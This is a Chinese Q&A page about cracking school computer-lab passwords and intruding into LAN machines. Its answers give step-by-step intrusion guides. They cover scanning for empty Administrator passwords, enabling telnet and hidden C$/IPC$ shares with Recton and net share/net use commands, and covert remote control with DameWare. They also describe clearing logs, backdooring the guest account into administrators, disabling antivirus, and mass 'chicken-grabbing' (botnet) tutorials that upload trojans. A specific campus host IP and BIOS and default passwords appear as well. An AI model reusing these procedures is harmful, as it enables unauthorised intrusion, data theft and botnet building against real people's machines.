barriers / 阅读 / 详情

机房电脑密码怎么破?

2023-06-28 06:31:39
共1条回复
北境漫步
学校公共机房电脑的一些破解
1.入侵主机:

  主机IP为:219.221.84.129,登陆用户名有administrator及guanliji1,用NTscan变态扫描器扫到此机开了139端口,且是弱口令,用Recton--D贺免杀专用版开启23端口,开共享net share ipc$,net share admin$,net use \219.221.84.129IPC$ "" /user:administrator,用DameWare迷你中文版 4.5控制主机。开共享net share C$=C,net share D$=D,完全共享主机C,D盘,可以任意复制主机上的文件。

  2.突破网管限制,免费浏览学校资源

  用帐号登陆进入后,使用"进程杀手"等带有进程管理的软件,强行结束"manage.exe"进程,然后进入西南大学主页,退出自己的上网帐号,则可以免费任意浏览学校的资源.

  3.网管软件:西南师范大学机房管理系统

  安装在"E:control"中,有四个文件"LOAD.exe,LOCK.exe,manage.exe,manage.txt",安装程序备份在"C:机房管理系统for_98me".

  4.网络还原精灵:

  安装在"C:Program FilesGoldenSoftNetRGWin9XClient",用软机"NetRGSet.exe"检查本机NetRG Pro,查的密码为:12345678(默认密码),安装程序备份在"C:网络还原精灵NetRG-prov2.1.0(060317)",Ghost还原软件安装在"E:Ghost"中.

  5.BIOS及机子基本资料

  用"BIOS密码查看程序"查的密码为:32001200,机子IP:219.221.84.***,用户名:swnu,操作系统:windows me,主机名称:q22,主域服务器:202.202.96.33,从域服务器:61.128.128.68,域服务3:218.201.4.3

  6.进C或E盘方法:

  在"快速启动栏"中的"Windows Media Player"上点右键,查看属性,选择"查找目标",进入"C:Program FilesWindows Media PlayerWMPLAYER.EXE",就可进C盘,若将“查找目标”中内容改成"E:",则可进E盘.

  (    

相关推荐

Recton是怎么开启远程计算机23端口的,什么原理?自己能开吗?

在服务列表里就可以打开或关闭 23端口是telnet的端口。   Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。   23端口说明:23端口主要用于Telnet(远程登录)服务,是Internet上普遍采用的登录和仿真程序。   同样需要设置客户端和服务器端,开启Telnet服务的客户端就可以登录远程Telnet服务器,采用授权用户名和密码登录。登录之后,允许用户使用命令提示符窗口进行相应的操作。在Windows中可以在命令提示符窗口中,键入“Telnet”命令来使用Telnet远程登录。   操作建议:利用Telnet服务,黑客可以搜索远程登录Unix的服务,扫描操作系统的类型。而且在Windows 2000中Telnet服务存在多个严重的漏洞,比如提升权限、拒绝服务等,可以让远程服务器崩溃。   Telnet服务的23端口也是TTS(Tiny Telnet Server)木马的缺省端口。所以,建议关闭23端口。
2023-06-28 05:22:311

Recton是怎么开启远程计算机23端口的,什么原理?自己能开吗?

23端口是一个管理员远程命令登入服务器。以前在2003服务器上是开着的。能使管理员方便管理。但是现在一般都是关的。因为大家都知道了这个漏洞的。还有以前有一个$tcp管道命令。但是现在的电脑都有防火墙。无法入侵。没有防火墙可以玩玩的
2023-06-28 05:22:381

为什么用 RECTON 开远程TELNET的时候总会提示错误?

可能你的RPC没有开启。右击“我的电脑”->"管理",弹出“计算机管理”窗口,点击“服务与应用程序”->“服务”,找到RPC,启用即可.也可能是你中了病毒,杀下毒试试。
2023-06-28 05:22:451

recton3 怎么用呀???

能问一下这是神马么?可以百度一下的。呃刚查了一下。用这个软件得大胆,先关杀软,再开,如果RP不好下的是病毒就惨了……
2023-06-28 05:22:522

recton 2.5 打不开

呵呵,这个是黑客程序,应该是被你的杀毒软件给杀了,重下个,把杀毒软件关了才行,不过风险自己承担啊
2023-06-28 05:22:592

RectonD的使用方法

你可以尝试用局域网查看工具扫描你同网段的IP,如果有可控制的,你就就用RectonD添如这个IP,就可以用里面的功能了,RectonD是针对那些计算机开放了某些服务,而且知道用户名和密码的电脑,一般是允许空密码登陆的电脑用ADMINISTRATOR就可以
2023-06-28 05:23:061

为什么 我用 recton v2.5 上传木马 总是出现异常错误 (木马免杀了)跪求.....

你的空间不稳定,换个收费的就好了
2023-06-28 05:23:133

如何入侵局域网电脑

  首先申明:   1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;   2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。   入侵工具:   一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。)   入侵步骤:   1.使用"NTscan变态扫描器",在IP处填上要扫描的IP范围,选择"WMI扫描"方式,按"开始"后就等扫描结果了。   2.使用"Recton--D贺免杀专用版"   选择"CMD命令"项,在"CMD:"中输入"net share C$=C:",即可开启远程主机的C盘共享,以此将"C"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入"\对方IPC$",即可进入对方C盘。   选择"Telnet"项,在"远程主机"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在"CMD选项"中,执行命令:"net share ipc$",接着执行:"net share admin$",最后执行"net use \***.***.***.***IPC$ "" /user:administrator"在*处填入你入侵的主机IP。   3.使用"DameWare迷你中文版 4.5",安装后点"DameWare Mini Remote Control",在"帮助"项中选择激活产品,输入注册信息,成功注册后,进入"远程连接"窗口,在"主机"处填入IP地址,点"设置",在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选,在"用户选项"中去掉"启用用户选项菜单"。设置完成好后,就可点"连接",在弹出的对话框中点"确定"后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。 注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份。   入侵步骤补充:   1.在以上第2步中,远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。   2.Recton--D贺免杀专用版还有其他功能,在"进程"项中,可以查看远程主机的进程,并可任意结束其中进程;在"共享"项中,可以创建共享,我常用是创建C$,D$,E$,F$,共享路径分别对应C:,D:等,共享好后在地址栏中输入"\IPC$",进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选"日志",清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。   3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):"net share C$=C:",共享system文件夹:"net share c=c:winntsystem32",共享IPC$用:"net share IPC$"等,最后是关闭共享,关闭C盘共享:"net share C$ /del"。   4.为方便下次入侵,可以设置后门, 查看用户:"net user",激活guest用户   "net user guest /active:yes",更改guest的密码为poco:"net user guest poco",把guest的`权限提升为管理员权限:"net localgroup administrators guest /add"。   5.telnet命令(DOS命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:""dir d:",查看C盘program file文件夹:"dir c:PROGRA~1;",60秒倒记时关机:"shutdown -s -t 60"   补充说明:   1.net use错误原因解决:   (1)."发生系统错误 1326。 登录失败: 未知的用户名或错误密码。"   在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接,是无法访问C$等管理共享的.   (2)"发生系统错误 1327。 登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".   (3)"//IP/c$"时提示找不到网络途径。在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性,进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS".
2023-06-28 05:23:211

扫描到端口后可以干什么坏事?

把电脑包起来,从22楼扔下去,o(∩_∩)o...哈哈。
2023-06-28 05:23:303

机房里关掉别人的电脑

shutdown -f
2023-06-28 05:23:404

如何在局域网中用一台机器登陆另一台机器的界面,并进行一定的操作。

那台机器需要允许远程连接 而且你登陆的用户需要有密码
2023-06-28 05:24:006

关于一些入侵软件,详情请看补充

像这一类的软件不一定都有病毒,倒是反病毒软件会把它们列入病毒的行列!
2023-06-28 05:24:212

135端口问题

在防火墙创建一个规则就行了用superscan扫IP若已获得存在139主机就直接操作要使用nbtstat-aIP资源共享命令:net viewnetuser看到计算机列表共享资源等对方信息4接下来用到的就是nbtstat–r和nbtstat–c两个命令用它就可知道主机IP地址和用户名了这样就可以了偶手好累呵呵~~
2023-06-28 05:24:292

怎么能破来电防火墙

首先申明: 1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。 入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。) 入侵步骤: 1.使用"NTscan变态扫描器",在IP处填上要扫描的IP范围,选择"WMI扫描"方式,按"开始"后就等扫描结果了。 2.使用"Recton--D贺免杀专用版" 选择"CMD命令"项,在"CMD:"中输入"net share C$=C:",即可开启远程主机的C盘共享,以此将"C"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入"\对方IPC$",即可进入对方C盘。 选择"Telnet"项,在"远程主机"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在"CMD选项"中,执行命令:"net share ipc$",接着执行:"net share admin$",最后执行"net use \***.***.***.***IPC$" /user:administrator"在*处填入你入侵的主机IP。 3.使用"DameWare迷你中文版 4.5",安装后点"DameWare Mini Remote Control",在"帮助"项中选择激活产品,输入注册信息,成功注册后,进入"远程连接"窗口,在"主机"处填入IP地址,点"设置",在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选,在"用户选项"中去掉"启用用户选项菜单"。设置完成好后,就可点"连接",在弹出的对话框中点"确定"后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。 注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份。 入侵步骤补充: 1.在以上第2步中,远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。 2.Recton-D贺免杀专用版还有其他功能,在"进程"项中,可以查看远程主机的进程,并可任意结束其中进程;在"共享"项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:,D:等,共享好后在地址栏中输入\IPC$,进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选"日志",清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。 3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):"net share C$=C:",共享system文件夹:"net share c=c:winntsystem32",共享IPC$用:"net share IPC$"等,最后是关闭共享,关闭C盘共享:"net share C$ /del"。 4.为方便下次入侵,可以设置后门, 查看用户:"net user",激活guest用户 "net user guest /active:yes",更改guest的密码为poco:"net user guest poco",把guest的权限提升为管理员权限:"net localgroup administrators guest /add"。 5.telnet命令(dos命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:""dir d:",查看C盘program file文件夹:"dir c:PROGRA~1;",60秒倒记时关机:"shutdown -s -t 60" 补充说明: 1.net use错误原因解决: (1)."发生系统错误 1326。 登录失败: 未知的用户名或错误密码。" 在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接,是无法访问C$等管理共享的. (2)"发生系统错误 1327。 登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆". (3)"//IP/c$"时提示找不到网络途径。在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性,进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS".首先申明: 1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。 入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。) 入侵步骤: 1.使用"NTscan变态扫描器",在IP处填上要扫描的IP范围,选择"WMI扫描"方式,按"开始"后就等扫描结果了。 2.使用"Recton--D贺免杀专用版" 选择"CMD命令"项,在"CMD:"中输入"net share C$=C:",即可开启远程主机的C盘共享,以此将"C"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入"\对方IPC$",即可进入对方C盘。 选择"Telnet"项,在"远程主机"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在"CMD选项"中,执行命令:"net share ipc$",接着执行:"net share admin$",最后执行"net use \***.***.***.***IPC$" /user:administrator"在*处填入你入侵的主机IP。 3.使用"DameWare迷你中文版 4.5",安装后点"DameWare Mini Remote Control",在"帮助"项中选择激活产品,输入注册信息,成功注册后,进入"远程连接"窗口,在"主机"处填入IP地址,点"设置",在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选,在"用户选项"中去掉"启用用户选项菜单"。设置完成好后,就可点"连接",在弹出的对话框中点"确定"后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。 注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份。 入侵步骤补充: 1.在以上第2步中,远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。 2.Recton-D贺免杀专用版还有其他功能,在"进程"项中,可以查看远程主机的进程,并可任意结束其中进程;在"共享"项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:,D:等,共享好后在地址栏中输入\IPC$,进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选"日志",清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。 3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):"net share C$=C:",共享system文件夹:"net share c=c:winntsystem32",共享IPC$用:"net share IPC$"等,最后是关闭共享,关闭C盘共享:"net share C$ /del"。 4.为方便下次入侵,可以设置后门, 查看用户:"net user",激活guest用户 "net user guest /active:yes",更改guest的密码为poco:"net user guest poco",把guest的权限提升为管理员权限:"net localgroup administrators guest /add"。 5.telnet命令(dos命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:""dir d:",查看C盘program file文件夹:"dir c:PROGRA~1;",60秒倒记时关机:"shutdown -s -t 60" 补充说明: 1.net use错误原因解决: (1)."发生系统错误 1326。 登录失败: 未知的用户名或错误密码。" 在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接,是无法访问C$等管理共享的. (2)"发生系统错误 1327。 登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆". (3)"//IP/c$"时提示找不到网络途径。在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性,进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS".
2023-06-28 05:24:361

黑客如何通过ip放病毒

你想太多了~~
2023-06-28 05:24:453

135抓鸡教程

最近135抓鸡很火热啊,会抓而且能抓的人一天就可以抓数百只甚至千只,而不会也没条件抓的呢一只都抓不到,当然这其中是有很多原因的,想利用135抓鸡成功的话必须要掌握细节!总体来说,135抓鸡的流程就是:扫开放135端口的IP-----过滤这些IP中的空口令IP-----最后利用这些空口令IP进行传马,就这么简单,但是却很多人不成功,其实我相信大家都会的,只是由于某方面的限制而不能成功的,比如自己电脑的原因:1.XP打了线程补丁没?一般设置为3000以上;自己电脑的一些服务开放了没?比如扫135必须要开放的TCP/IP NetBIOS Helper Remote Procedure Call (RPC) Locator NT LM Security Support Provide 这几个服务;2.还有一个原因就是找找自己的电脑开放了共享没有?在DOS下输入net share看看自己电脑的共享情况,一般来说要开放ADMIN$...在这里呢,很多朋友说自己输入这个命令后却发现出现错误,没有共享的东西!这里我也遇到过,主要是由于自己的电脑做过某些优化而已!解决办法是打开电脑的SERVER服务,但是问题又来了,有些人会发现自己的电脑没有这个服务!怎么办?我告诉大家是网络邻居里的问题,解决办法如下:网上邻居----本地连接-----属性--看到安装的协议框里有没有“Microslft网络的文件和打印机共享”这个项目,如果没有就点下面的安装选项里进行安装,安装完了就会发现服务里多了SERVER一项了,呵呵,启动它就可以了! -----------------------以上是电脑的要求 现在呢,大家按我的方法做好的电脑本身的要求外,又会发现,还是扫不了啊?原因我想大家都知道了,就是电信屏蔽了135端口,所以我们在本机扫135是扫不到的!很多人又问,我用代理可以吗?我的回答是:“最好别用,因为普通的SOCKET5代理扫出来很多都是假的,就像前段时间很多黑网出的一个用easy2game代理扫端口的教程,一扫就一大片,后面经过很多人的验证包括我也亲自验证了,发现扫出来的都是假的!!所以大家最好别去用! 接下来呢,还有什么方法呢?找台可以扫135的服务器来扫对吧,我也用过,虽然还不错,但是对于大多数人来说不太适用,因为这样的肉鸡很难找! 所以我还是推荐用VPN! 然后又有很多问了,我用VPN扫可以扫出开放135的IP,但是过滤却一个也出不来?为什么呢? 其实我原来也经常遇到过这样的情况,用VPN可以正常扫出135,但是用NTSCAN过滤空口令的时候最多出来几个子,我也一度曾想放弃VPN这个方法,但是后来的实验告诉我,VPN是有用的,而且绝对有用的!关键的问题是你连接这个VPN的速度!!加入你的电脑连接这个VPN的速度过慢,那是肯定扫不出来,因为这样的话,网络的迟缓非常严重,数据到不了自己电脑的!像很多人用的”Hotspot Shield Launch“这个软件,我在很多肉鸡上实验过,连接速度都是非常慢的!!扫不出什么肉鸡,而我每次只要使用连接速度快的VPN就能扫出很多的肉鸡,一般我所说的连接快的VPN呢,是指从开始连接到连接成功,时间应该不超过6秒钟~待会儿我会给大家提供一个香港的VPN的,呵呵!~ 现在开始讲扫135的工具了,欲善其事,必先利其器!所以一个好用的工具也是非常重要的!接下来我就讲几个比较完善好用的工具,像蜜蜂2.0之类的垃圾软件我就不多说了! 加入不讲效率的话,一般人用的最多的组合是“S扫描器+NTSCAN+RECTON”,很简单,但是也很麻烦,只能单个单个的传马,速度很慢! 这套工具我就不多说了,大家应该都会,主要就是说下,就是用NTSCAN过滤完了弱口令后,使用RECTON传马的时候也要在VPN连接的状态下,要不然不能成功连上肉鸡! 下一个工具呢,就说批量135脚本吧吧! 其实关于脚本135应该有2套工具:一种是用NTSCAN扫玩了弱口令后,用批量溢出工具加上一个135批量溢出的批处理结合使用!-还有一种就是完全的批处理程序了,包括扫描135端口,过滤弱口令,传马,都在批处理里完成的,代表就是“自动抓鸡飘渺开源版”,只要输入IP就能全自动的抓鸡了,不过有个缺点,考虑弱口令的时候会有很多DOS窗口弹出来,速度呢,还算可以吧!!所以也建议大家使用!~ 再下一个工具呢,当然就是WMI.EXE了,我本人现在也在使用这个工具,优点是:方便,速度快!缺点是:“要自己修改源程序代码,也就是那个3322的域名了,然后自己建了FTP就可以了 ,呵呵,挺方便的! 具体的工具就是这些了,这些工具的使用方法网上搜索下就可以了,很多额,也很简单的! 如果大家觉得好的话呢,就帮我踩下空间!还有大家有什么问题的话,可以留言,QQ112898881 我会尽快回答的!呵呵 参考资料:f
2023-06-28 05:24:521

怎么用灰鸽子抓肉鸡

问题一:灰鸽子怎么抓肉鸡 本人第一次用这个 求详细的 100分 灰鸽子正确的配置需要了解你的网络环境,内网和外网配置方式不同。内网映射,外网ftp、dns都可以实现自动上线。 灰鸽子抓鸡就是把你的服务端传播出去,使人运行的过程 我的百度账号就是我的qq 问题二:灰鸽子远程以后如何抓鸡 运行X-way.exe打开主界面,左边工具栏选主机搜索,中间弹出窗填要扫描的起始IP地址,如自己的上网IP地址为58.54.144.20,可填起始地址为58.54.0.20,结束地址为58.54.255.20。(注意结束地址比起始地址大)。自己的上网IP可在hao123主页下部实用查询里的IP地址页看到。注意机器重启后上网IP会发生改变。搜索方式选端口方式(默认),线程设置里线程数可改为50-1000任选(根据机器性能)。这里说明一下,WIN XP 默认连接数为10,需先进行线程破解,网上工具很多,实在不行下载迅雷,迅雷软件界面顶端工具栏展开后选系统优化工具,修改连接数最大支持1024,重启后生效。X-way主机搜索界面,线程设置下面点击高级设置,弹出主机搜索各参数设置窗口,端口设置里勾选other,端口139(默认)改为135,连接延时改为2秒,其他不变,关闭回到主机搜索界面。点击开始,扫描完毕后(也可中途停止),在下面主机列表框内右键点击,保存为 135.txt。建议保存到桌面,文件135.txt打开后样式如下: 58.54.1.65 端口:135开放 58.54.1.78 端口:135开放 58.54.1.85 端口:135开放 58.54.1.34 端口:135开放 58.54.1.109 端口:135开放 58.54.1.116 端口:135开放 58.54.1.135 端口:135开放 58.54.1.25 端口:135开放 58.54.1.146 端口:135开放 58.54.1.95 端口:135开放 58.54.1.123 端口:135开放 58.54.1.154 端口:135开放 运行黑色旋风IP程序进行IP整理(手动整理也可),将弹出RaScal记事本,清空记事本内全部内容,再将135.txt内的全部内容复制到RaScal记事本,关闭RaScal记事本,将询问是否保存,点击“是”。回到黑色旋风IP整理工具,在窗口内点击一下(激活窗口),然后回车进行IP整理。稍等,整理完必的纯净IP文件,默认保存在黑色旋风IP安装目录下的RaScal文件里,打开后样式如下:(注意不要有其他内容或空格,绝对纯净) 58.50.1.101 58.50.2.238 58.50.5.3 58.50.7.112 58.50.13.87 58.50.15.233 58.50.20.22 58.50.20.28 58.50.20.66 58.50.20.69 58.50.20.107 打开ntscan10汉化版,可先用汉化补丁进行汉化处理(注意补丁安装路径应选择ntscan10安装目录),完毕后运行NTscan程序打开主界面,清空开始和结束IP,勾选主机文件,后面打开找到存放纯净IP的文件RaScal,线程数50-500任选(默认50),连接共享选admin$(默认),扫描选项勾选WMI扫描,扫描主机打开的端口改为135,其他不变。点击开始,NTscan程序将进行弱口令筛选。顺便提一下,NTscan10程序的弱口令文件在其安装目录下的NT_pass文件和NT_user文件里,NT_pass里是弱口令密码,NT_user里是常用弱口令用户,可用写字板打开编辑,进行弱口令增减,如可增加弱口令密码112233,666666,14......>> 问题三:如何用灰鸽子抓肉鸡 图文详细版 70分 现在这款的功能都有限了,还有更好的+ 问题四:如何利用灰鸽子或其他工具抓肉鸡~扫描端口? 你们好狠啊 竟敢公开玩黑客。 牛逼啊 问题五:我也是个黑客,用灰鸽子抓了多少肉鸡 请允许我呵呵一下,还灰鸽子你是火星来的吧?这年代谁还用灰鸽子 问题六:我可能被别人用灰鸽子当肉鸡抓了怎么办啊 你宽带 拿去刷钻 刷QB啦, 解决方法简单, 你一开机, 打开任务管理器, 有个IEXPLORE.EXE 这是灰鸽子伪装的进程 其实是 灰鸽子. 灰鸽子首先丹感染IE 你只需要 管理此 进程就够了, 但是麻烦点,每次开机 都关闭,别人就无法控制啦.第二个方法, C盘还原.第三个方法.到杀毒软件 免费体验20多款杀软 查杀,灰鸽子做免杀不可能 针对 每一款做免杀,.第四个方法, C盘WIOWS文件夹进入 有个 一个安装文件的 图标, 那个就是 灰鸽子启动的木马,. 删除, 删除之前 必须 切断 IEXPLORE.EXE 这个进程 就能删除, 问题七:灰鸽子怎么对肉鸡进行远程桌面控制啊? 客户端要在肉鸡上运行才行,有一个t开头的链接,连接上ok 问题八:抓肉鸡需要什么工具? 领域中国抓肉鸡工具1008更新本软件修改了,中英文服务器使用时的,语言编码错误。加强.完善了扫描。完成配置信息后请手动运行此文件.bat自动抓肉鸡!以免减...10个回复-发帖时间:2009年4月26日软件大小:0K软件语言:简体中文软件属性:热软件添加:华夏黑客联盟软件等级:更新时间:2007-7-32:15:30解压密码:...教程名称:抓国外肉鸡详细版+工具动画大小:0K动画语言:12动画类型:1...4。现在开始用工具连它看出来了不知道是什么从来没看到过呵呵搞笑了换一抓肉鸡工具等会...9个回复-发帖时间:2009年1月6日9个回复-发帖时间:2007年3月12日中国知音445+139端口溢出批量抓肉鸡工具[第二版-皇冠体验版]免费版本.exeMD5:f07c440faed44e1316fed4519f6859f47,Trojan-Downloader.4293!IK,Win-Trojan/Xema.variant...8个回复-发帖时间:2009年5月1日20个回复-发帖时间:20071433抓肉鸡工具下载3月12日领域中国抓肉鸡工具2008更新软件修改了,中英文服务器使用时的,语言编码错误。加强.完善了扫描。,扫描工具,下载中心,戴威尔网络安全培训 文章来源: moker 原文链接: moker/wenwen/content/4135436193.shtml 问题九:挂马抓肉鸡,懂得+++ 抓鸡方法 135端口,先扫描135IP,然后整理!然后用NTscan,扫描弱口令,最后用Recton上传木马,自动运行的!因为这个漏洞很久,所以端口也很少的了!如果整理IP不好,就很难扫出弱口令。 1433端口,先扫描1433IP,然后整理!然后用X-Scan-v3.3,扫描模块只选择SQL-Server弱口令,然后扫出漏洞主机,再用SQLTools.exe连接,看看能不能执行DOS,如果不能就修复下,可以用“SQL查询分析器修正分离版”,修复命令我会打包的了! 3389端口,先扫描3389IP,然后用远程桌面连接,一个一个IP添加进入,见到XP,用户new密码为空进入,然后下载木马!见到2000,用户administrator密码为空进入然后下载木马! 4899端口,先扫描4899IP,然后整理!然后用4899探测器,A导入4899IP,然后开始搜索,B就是空口令的IP了,然后用Radmin,点连接到,把刚才扫到的空口令的IP添到IP地址那里,点确定,然后自己上传马,用DOS运行! 5900端口,用领域小组专版VNC扫描器,这个端口有些特别,不同其他的端口,所以扫IP工具也不同,扫到IP,看看有无V字开头,然后用VNCLink连接,自己然后下载马拉! 80端口,先扫描80IP,然后整理,再用Apache Tomcat导入IP,端口8080改为80, 问题十:灰鸽子能用来抓肉鸡么?怎么抓的? 灰鸽子让对方点击,是对方成为服务端 然后你作为客户端就可以连接上去了 灰鸽子最早只是款远控软件 然后功能太过强大就成木马了
2023-06-28 05:25:001

知道IP和端口,怎样最简单的入侵到远程主机?

 通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)   协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码;   使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。   下面我就来介绍一下通过135端口入侵的方法。   (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址,然后在“结束”文本框里填写好扫描结束的IP地址,在“扫描类型”选项中选择“所有端口定义”单选按钮,并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。   (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择“WMI扫描”,在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。   (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM权限。   下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样,就这么轻松得到了一台。是不是很过瘾啊。
2023-06-28 05:25:212

怎么抓“鸡”?

